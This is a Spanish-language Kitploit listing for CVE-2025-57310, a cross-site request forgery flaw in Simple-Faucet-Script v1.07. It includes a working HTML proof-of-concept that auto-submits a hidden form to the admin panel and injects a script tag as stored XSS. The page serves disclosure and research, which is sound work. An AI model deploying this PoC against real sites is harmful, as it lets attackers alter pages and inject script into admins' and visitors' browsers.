Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57310 — Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Salmen2/Simple-Faucet-Script v1.07 a través de una solicitud POST manipulada a admin.php?p=ads&c=1 que permite a los atacantes ejecutar código arbitrario. | Kitploit
Herramientas/GitHubGitHub/mmakingdom/cve-2025-57310
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Salmen2/Simple-Faucet-Script v1.07 a través de una solicitud POST manipulada a admin.php?p=ads&c=1 que permite a los atacantes ejecutar código arbitrario.

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-57310

Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Salmen2/Simple-Faucet-Script v1.07 a través de una solicitud POST manipulada a admin.php?p=ads&c=1 que permite a los atacantes ejecutar código arbitrario.

CWE

CWE-352: Cross-Site Request Forgery (CSRF)

CVSS v3.1 Puntuación Base: 8.8 (Alta)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Resumen

El producto es vulnerable a Cross-Site Request Forgery (CSRF) en el panel de administración. Cuando un administrador autenticado visita una página maliciosa que contiene el PoC, el ataque CSRF provoca la modificación no autorizada del contenido de la página de inicio.

Pasos para reproducir

  1. Inicie sesión como administrador en https://example.com/admin.php
  2. Abra el siguiente PoC y observe una alerta emergente en la página de inicio (XSS almacenado).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

Impacto

Un atacante puede inyectar HTML/JavaScript arbitrario en la página de inicio a través del parámetro spacetop, lo que conduce a Cross-Site Scripting (XSS) almacenado.

Créditos

Muntadhar M. Ahmed (almuntadhar0x01)

Descargar herramienta